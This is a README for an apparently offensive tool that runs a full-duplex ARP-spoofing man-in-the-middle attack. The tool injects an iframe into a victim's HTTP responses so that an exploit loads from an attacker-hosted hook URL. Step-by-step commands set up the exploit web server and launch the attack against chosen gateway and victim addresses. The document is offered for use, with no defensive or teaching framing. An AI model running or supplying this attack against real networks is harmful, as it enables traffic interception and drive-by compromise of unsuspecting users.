README
======

DESCRIPTION
===========

This tool is a simple MiTM (Man in The Middle) and HTTP injector attack:

    - Run full-duplex MiTM attack via ARP spoofing to victim and gateway addresses
    - Inject an HTTP iframe (it'll serve exploit with the agent) into every HTTP response of victim

This tool was tested on Ubuntu 16.04 LTS.

LET'S GO
========

First run setup in order to install all packages:

    $ ./setup.sh

Then run main in order to see all required parameters:

    $ cd src/
    $ ./Main.py -h

Next find Network Interface, Gateway, Victim, HTTP Server and Hook URL addresses like these:

    - Network Interface: enp12s0
    - Gateway address: 10.1.17.1
    - Victim address: 10.1.17.50
    - HTTP Server address: 10.1.17.10:5000
    - Hook URL address: http://10.1.17.10:5000/exploit

    Where Hook URL address is hosted by our websrv.

After run Web server on a terminal like this:

    $ python -m SimpleHTTPServer 5000

Finally stop SimpleHTTPServer and run main again with all parameters on another terminal like this:

    $ ./Main.py -i enp12s0 -g 10.1.17.1 -t 10.1.17.50 -u http://10.1.17.10:5000/exploit

Have a nice day! ;)
